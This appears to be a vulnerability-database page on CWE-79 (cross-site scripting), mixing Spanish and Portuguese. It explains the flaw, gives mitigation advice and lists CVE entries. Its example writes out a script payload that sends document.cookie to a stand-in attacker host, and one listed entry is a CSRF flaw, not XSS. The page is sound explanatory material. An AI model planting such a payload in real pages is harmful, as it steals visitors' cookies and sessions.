Fallos del tipo CWE-79

28.635 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-0471—Favicon by RealFaviconGenerator < 1.3.23 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2019-1882MEDIUMCisco Industrial Network Director Stored Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2022-0399—Advanced Product Labels for WooCommerce < 1.2.3.7 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-21383HIGHXSS in Wiki.jsEPSS 0.9%CVE-2021-25027—PowerPack Addons for Elementor < 2.6.2 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-25043—WOOCS < 1.3.7.3 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-0601—Countdown & Clock < 2.2.9 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2024-28671HIGHDedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /dede/stepselect_main.php.EPSS 0.9%CVE-2019-1707MEDIUMCisco DNA Center Access Contract Stored Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2019-3889MEDIUMA reflected XSS vulnerability exists in authorization flow of OpenShift Container Platform versions: openshift-online-3, openshift-enterprisEPSS 0.9%CVE-2022-0431—Google Pagespeed Insights < 4.0.4 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2018-0483MEDIUMCisco Jabber Client Framework Instant Message Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2021-25077—Store Toolkit for WooCommerce < 2.3.2 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-0161—ARI Fancy Lightbox < 1.3.9 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2018-0482MEDIUMCisco Prime Network Control System Stored Cross-Site Scripting VulnerabilityEPSS 0.9%CVE-2022-0193—Complianz - GDPR/CCPA Cookie Consent < 6.0.0 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2022-0176—PowerPack Lite for Beaver Builder < 1.2.9.3 - Reflected Cross-Site ScriptingEPSS 0.9%CVE-2026-88058HIGHAngular: SSR XSS via Unescaped Processing Instruction (<?...?>) Nodes in Fallback Raw-Content ElementsEPSS 0.9%CVE-2024-11201MEDIUMmyCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send ShortcodeEPSS 0.9%CVE-2024-9458MEDIUMReservit Hotel < 3.0 - Admin+ Stored XSSEPSS 0.9%